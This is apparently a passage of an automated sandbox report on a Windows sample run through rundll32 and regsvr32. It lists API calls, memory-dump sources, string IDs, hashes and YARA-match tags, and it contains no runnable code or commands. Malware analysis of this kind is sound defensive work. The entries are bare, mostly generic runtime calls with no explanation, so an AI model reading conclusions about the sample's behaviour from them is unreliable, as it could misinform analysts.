                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 3472027048-435796455
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7F2F0525
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7F2F0590
                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7F2F05AD
                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7F2F05EC
                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7F2F064B
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7F2F066E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiStringWide
                                                • String ID:
                                                • API String ID: 2829165498-0
                                                APIs
                                                • GetLastError.KERNEL32(?,?,7F2F3E3A,7F2F1A31,7F2F07C3), ref: 7F2F3E51
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7F2F3E5F
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7F2F3E78
                                                • SetLastError.KERNEL32(00000000,?,7F2F3E3A,7F2F1A31,7F2F07C3), ref: 7F2F3ECA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *$8$TMP
                                                • API String ID: 0-2442449778
                                                • Opcode ID: 13a0c4451d135f2ebd901ae8be016aca17423051db3a4fb97080b4ba4a19ed21
                                                • Instruction ID: 7b66d868b319b651bd04a058d8d697215402fa81d268c268e3916578145f81de
                                                • Opcode Fuzzy Hash: 13a0c4451d135f2ebd901ae8be016aca17423051db3a4fb97080b4ba4a19ed21
                                                • Instruction Fuzzy Hash: 63E11AB4E05268CFDB16CF69C844BADBBF5FB4A304F10959AD448A7350D7349A80CF69
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F2FF265
                                                • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F2FF277
                                                • swprintf.LIBCMT ref: 7F2FF298
                                                • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F2FF2D5
                                                Strings
                                                • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F2FF28D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleFileHandleTypeWriteswprintf
                                                • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                • API String ID: 2943507729-1719349581
                                                • Opcode ID: 74d6f88e90dd893a090c103c4109af082bbff934e06af16182672fe97f44aebc
                                                • Instruction ID: 60c90dd981e6547d46de46436c0d36ecf641a17e68ea9fe07b194c06eb2ad4ce
                                                • Opcode Fuzzy Hash: 74d6f88e90dd893a090c103c4109af082bbff934e06af16182672fe97f44aebc
                                                • Instruction Fuzzy Hash: 0B11047A900219ABCB109F2ACC44ADEB3FCEF44320F544659EA27D7140EB30AE41CB64
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,822C75DE,7F3152A0,?,00000000,7F313C13,000000FF,?,7F30077A,7D83FC4D,?,7F30074E,7F3152A0), ref: 7F30081F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7F300831
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,7F313C13,000000FF,?,7F30077A,7D83FC4D,?,7F30074E,7F3152A0), ref: 7F300853
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 2944985eee28cd0b96fa8895f467118bbe3911e835d144e79014633704d2ba39
                                                • Instruction ID: adb1f4291a1b54076700b0fa9bbe5e1b7b142ea2cb54e13d6c857fd57e876993
                                                • Opcode Fuzzy Hash: 2944985eee28cd0b96fa8895f467118bbe3911e835d144e79014633704d2ba39
                                                • Instruction Fuzzy Hash: E301A276910A15EFDB059F51CC05FEEBBBCFB04722F04023AEC13A6680DB789900CA90
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A5947
                                                • int.LIBCPMTD ref: 7F2A5960
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F2AAA36
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F2AAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F2A59A7
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2A5A3B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: a67ad1f3e68cddbe04d5b6bc865ea2be2ee78e4a2c2303f5764bfe7613940f24
                                                • Instruction ID: 4d2dacc7cd820c5ec2da75aa87669619105477151e5ac4f1d1d151b92aff8954
                                                • Opcode Fuzzy Hash: a67ad1f3e68cddbe04d5b6bc865ea2be2ee78e4a2c2303f5764bfe7613940f24
                                                • Instruction Fuzzy Hash: 8C4183B5D00609DFCB04CF98D981BEEBBB5FF48310F208259E925A7394E7356A45CBA1
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A5807
                                                • int.LIBCPMTD ref: 7F2A5820
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F2AAA36
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F2AAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F2A5867
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2A58FB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: c3a43125088ff60729170b46ce59c6a1fbc30b9ee09b322b5ffaf47def903cf8
                                                • Instruction ID: be8eac11cac696c77a0889012ec281c5b3e9ca598ee777f2cb2b13bdaa840f75
                                                • Opcode Fuzzy Hash: c3a43125088ff60729170b46ce59c6a1fbc30b9ee09b322b5ffaf47def903cf8
                                                • Instruction Fuzzy Hash: DF4192B4D00609DFCB04CF98D981AEEBBB5FF48310F208259E925A7390D7356A45CBA1
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A56C7
                                                • int.LIBCPMTD ref: 7F2A56E0
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F2AAA36
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F2AAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F2A5727
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2A57BB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: a3bf4294d42ca26ade55a5748a1c349b7171d0db87f3957d55c205570cca2b1b
                                                • Instruction ID: 302d7aa52db2190175be8485a408395964d7d7b3c65ad2f6abde3827fbe2ff42
                                                • Opcode Fuzzy Hash: a3bf4294d42ca26ade55a5748a1c349b7171d0db87f3957d55c205570cca2b1b
                                                • Instruction Fuzzy Hash: B741B4B8D00609DFCB04CF98D991BEEBBB5FF48310F208259E925A7394D7356A45CBA1
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 7F2EFDAB
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2EFDB6
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2EFE24
                                                  • Part of subcall function 7F2EFF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F2EFF1F
                                                • std::locale::_Setgloballocale.LIBCPMT ref: 7F2EFDD1
                                                • _Yarn.LIBCPMT ref: 7F2EFDE7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                • String ID:
                                                • API String ID: 1088826258-0
                                                • Opcode ID: ffe859982c4ffd72e47c7188fc067aa002ae289ca25de4fd6eb56baa9d5e54a9
                                                • Instruction ID: 72e79aea7113cb85bfe10fb384809ac71c4aac8a19fc476172f784484d7c2bb3
                                                • Opcode Fuzzy Hash: ffe859982c4ffd72e47c7188fc067aa002ae289ca25de4fd6eb56baa9d5e54a9
                                                • Instruction Fuzzy Hash: 8F019A3AA00611ABD706DB20C548A7DBBA9FF85220BB84048D86297780DF386F02CB80
                                                APIs
                                                • LoadLibraryExA.KERNEL32(advapi32,00000000,00000008), ref: 7F2C4841
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: MNo name attribute $advapi32$Operation
                                                • API String ID: 1029625771-688042845
                                                • Opcode ID: 3ff4be4e097dd714283a542636699e528cd11720873e3cd3ba17d32deb023af8
                                                • Instruction ID: 9456ed17b0b04d723b0959899ccf925910f55f2e6c4205735af0a2c1e480ac90
                                                • Opcode Fuzzy Hash: 3ff4be4e097dd714283a542636699e528cd11720873e3cd3ba17d32deb023af8
                                                • Instruction Fuzzy Hash: 3091A475D082A88BDB15CF66CC907EEBBBABF44314F1481DED449A7285CB346A90CF54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea
                                                • String ID: 9E(j
                                                • API String ID: 240046367-705430000
                                                • Opcode ID: bf7e7b70560e12e6e662d755a9290f75144fd59b6031b0d5e056d66a4cb2d427
                                                • Instruction ID: b119d65463d561b46344220029ab678cd91e155dffe7aff93d9ba94acdc2ed54
                                                • Opcode Fuzzy Hash: bf7e7b70560e12e6e662d755a9290f75144fd59b6031b0d5e056d66a4cb2d427
                                                • Instruction Fuzzy Hash: 2B51B772A20306AFEF15AF60CC40EFB3ABBEF44255B11012BFD0AD6150E671DD518760
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 7F2EF3F5
                                                • CloseHandle.KERNEL32(?), ref: 7F2EF49F
                                                • CloseHandle.KERNEL32(00000000), ref: 7F2EF4A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: ?
                                                • API String ID: 2922976086-1684325040
                                                • Opcode ID: a0433d775b8a110cd24904ca6239eeb438d8919f0cfc51785343732fce5a6cd8
                                                • Instruction ID: 4c60149079f419d37db9774eec7e0b04ff6eb167b8b93e2e1eff4c671587dfcd
                                                • Opcode Fuzzy Hash: a0433d775b8a110cd24904ca6239eeb438d8919f0cfc51785343732fce5a6cd8
                                                • Instruction Fuzzy Hash: 2821947190031ABBDF219A95CC09FEF7B7DFBC5710FE04469FA25A1050E7319A18CA60
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7F2F4F43,00000000,00000001,7F5F55E4,?,?,?,7F2F50E6,00000004,InitializeCriticalSectionEx,7F31AE34,InitializeCriticalSectionEx), ref: 7F2F4F9F
                                                • GetLastError.KERNEL32(?,7F2F4F43,00000000,00000001,7F5F55E4,?,?,?,7F2F50E6,00000004,InitializeCriticalSectionEx,7F31AE34,InitializeCriticalSectionEx,00000000,?,7F2F4E9D), ref: 7F2F4FA9
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7F2F3D43), ref: 7F2F4FD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 21cff0dd12f0ed54b76b5bafda5b13ebfd8e375a83ddfae89c61b2c0dbe5c0bd
                                                • Instruction ID: 5d96609dcfe52b2a282eafe3f816359397e5cd59d6ca7eac6ae9ec47b317b9b6
                                                • Opcode Fuzzy Hash: 21cff0dd12f0ed54b76b5bafda5b13ebfd8e375a83ddfae89c61b2c0dbe5c0bd
                                                • Instruction Fuzzy Hash: 97E04835254705B7EB121EA2DC05F497AB9EB10772F284030F90FE94D0E7A1E9319994
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7F2EF717,?,?,?,7F2EEF6C,?,0000000F,?,00000000,00000208), ref: 7F2EF946
                                                • GetProcAddress.KERNEL32(00000000), ref: 7F2EF94D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: RtlRandomEx$ntdll.dll
                                                • API String ID: 1646373207-4284430886
                                                • Opcode ID: e9ab37d400a9a2698b11170e98f9a3fa29e5e4128905810a8991360f31b62c59
                                                • Instruction ID: d8d0af9018401fa37a369fdf8d12e95cd637180bd974fadc9ba580f364f1419c
                                                • Opcode Fuzzy Hash: e9ab37d400a9a2698b11170e98f9a3fa29e5e4128905810a8991360f31b62c59
                                                • Instruction Fuzzy Hash: AAD0A77A6007056BDB015FE2CD08E153FAD9B042617690054FD0DC6100DB349B68CA60
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(822C75DE), ref: 7F30B7E6
                                                  • Part of subcall function 7F30772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7F305A54,?,00000000,?), ref: 7F3077DB
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7F30BA41
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7F30BA89
                                                • GetLastError.KERNEL32 ref: 7F30BB2C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: 47ae057a3528f9940d9282c831c2c56dbf49f3f27c5043ac3d9be42e1191994a
                                                • Instruction ID: aafc6d0b37c96c1190b54834d08488d83fd32c85cef358a0a38b8b6117a403be
                                                • Opcode Fuzzy Hash: 47ae057a3528f9940d9282c831c2c56dbf49f3f27c5043ac3d9be42e1191994a
                                                • Instruction Fuzzy Hash: C0D13BB5D002589FCB05DFA8C880AEDBBF6FF49314F18456AE866E7355D730A942CB50
                                                APIs
                                                  • Part of subcall function 7F30772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7F305A54,?,00000000,?), ref: 7F3077DB
                                                • GetLastError.KERNEL32 ref: 7F307AE5
                                                • __dosmaperr.LIBCMT ref: 7F307AEC
                                                • GetLastError.KERNEL32(?,?,?,?), ref: 7F307B26
                                                • __dosmaperr.LIBCMT ref: 7F307B2D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1913693674-0
                                                • Opcode ID: 90ef8b38a8357f7387c2aba524a3ffaf6f9ad850957ce5e2cff6eed6e9327324
                                                • Instruction ID: 1647d11003e97998239868dcbc65c4a4ec46d942f2b3034e14dfef34421b58b3
                                                • Opcode Fuzzy Hash: 90ef8b38a8357f7387c2aba524a3ffaf6f9ad850957ce5e2cff6eed6e9327324
                                                • Instruction Fuzzy Hash: 9921B371620705BFD711AF66C88096BB7BFFF00266714862AF82A9B640D730FD418BA0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddcc7f98b24df6bab2ff3c01fa0c718c2bbcba0d8f8654863c0b8caa425c6abf
                                                • Instruction ID: 35736a1780bb2a15586b28a139d7cd7d1862569bcc48d6b39bedef029c7adeee
                                                • Opcode Fuzzy Hash: ddcc7f98b24df6bab2ff3c01fa0c718c2bbcba0d8f8654863c0b8caa425c6abf
                                                • Instruction Fuzzy Hash: 37218E3162430AAFC7119F618C80E5AF7EAEF462757144715E836CB680EB30EC01CB60
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,7F300BC9), ref: 7F308997
                                                  • Part of subcall function 7F30772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7F305A54,?,00000000,?), ref: 7F3077DB
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7F3089CF
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7F3089EF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 158306478-0
                                                • Opcode ID: 04817ebb075197fc4ed811bbbf917466213cc8e88dfb8ea0d22aa6309cd328d6
                                                • Instruction ID: 203a227f50afce996f8a3ee848addb3cac673dbcc33b09cc99309012243f0a9d
                                                • Opcode Fuzzy Hash: 04817ebb075197fc4ed811bbbf917466213cc8e88dfb8ea0d22aa6309cd328d6
                                                • Instruction Fuzzy Hash: AF119BB6516715BFA716777A4CCCDAF2A6FEF451E9314053BFC02D6200EA24ED1242B1
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F790
                                                • GetLastError.KERNEL32(?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F79C
                                                  • Part of subcall function 7F30F762: CloseHandle.KERNEL32(FFFFFFFE,7F30F7AC,?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F772
                                                • ___initconout.LIBCMT ref: 7F30F7AC
                                                  • Part of subcall function 7F30F724: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7F30F753,7F30F076,?,?,7F30BB80), ref: 7F30F737
                                                • WriteConsoleW.KERNEL32(?,?,?,00000000,?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F7C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: e3733a81b2018a3cf62b6f030cf4430cf5ad83a7d3dec1992d9c72bab1d384ea
                                                • Instruction ID: 07cc2ab5c21029f07deb94fe3fd34a6227b24ba4429053b25e818d8ec766659b
                                                • Opcode Fuzzy Hash: e3733a81b2018a3cf62b6f030cf4430cf5ad83a7d3dec1992d9c72bab1d384ea
                                                • Instruction Fuzzy Hash: 3BF0A23B510654BBCF522FA6CC44A8D3F6BFB09BB1B184819FA299A111C631D8309BA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: +$-
                                                • API String ID: 3732870572-2137968064
                                                • Opcode ID: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
                                                • Instruction ID: 9c12977bc5aed3f5c7d462ae3157b4defaf0eb94ee971f0eb6bf135eac040608
                                                • Opcode Fuzzy Hash: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
                                                • Instruction Fuzzy Hash: FEA1C13092134AAFDB15CE78CC506EEFBF5EF56324F24865AE866AB384D234E501CB50
                                                APIs
                                                • std::exception::exception.LIBCONCRTD ref: 7F2C5868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: parse error$parse_error
                                                • API String ID: 2807920213-1820534363
                                                • Opcode ID: de802722b3b30ab55f0046b25cc11ae058f88909c61c29ab0177e5257169f794
                                                • Instruction ID: d5c04ad7c90973905d2bad5909432508c6c1f5029ede342b04dd5fb7212d6eb9
                                                • Opcode Fuzzy Hash: de802722b3b30ab55f0046b25cc11ae058f88909c61c29ab0177e5257169f794
                                                • Instruction Fuzzy Hash: 2BA1E274D04259DFCB18CF98C990BEEBBB1BF49300F248299D959AB341DB31AA45CF90
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?), ref: 7F2F457B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: 43f23b99cdb8e10fda91ce4d8958edfa8ecb432952a4590fadfcbe4a2096ed93
                                                • Instruction ID: 37b051a539461f9161267d828336ffbcab55b44a29cea28e86635d636ff4f330
                                                • Opcode Fuzzy Hash: 43f23b99cdb8e10fda91ce4d8958edfa8ecb432952a4590fadfcbe4a2096ed93
                                                • Instruction Fuzzy Hash: 2641287291420AAFCF06CF94C981EEEBBF9EF48304F154199F9066A251D375AA50DF50
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A7AF3
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F2A7BBF
                                                  • Part of subcall function 7F2EFEA2: _Yarn.LIBCPMT ref: 7F2EFEC1
                                                  • Part of subcall function 7F2EFEA2: _Yarn.LIBCPMT ref: 7F2EFEE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: 382ffc15beab67dfa8b12b67479deb6236b5c4454c09c6bd9356f5ac10bc7f41
                                                • Instruction ID: 3b26a163c0d0349ff652a7d170681ed766a8aac0e1ebf4da03ea86525829bc9d
                                                • Opcode Fuzzy Hash: 382ffc15beab67dfa8b12b67479deb6236b5c4454c09c6bd9356f5ac10bc7f41
                                                • Instruction Fuzzy Hash: 2D4136B0D05289DFDB01CF98C954BAEFBF1BF49304F288198D414AB381C77A9A01CBA5

                                                Execution Graph

                                                Execution Coverage:1.9%
                                                Dynamic/Decrypted Code Coverage:72.2%
                                                Signature Coverage:20.3%
                                                Total number of Nodes:79
                                                Total number of Limit Nodes:3

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID:
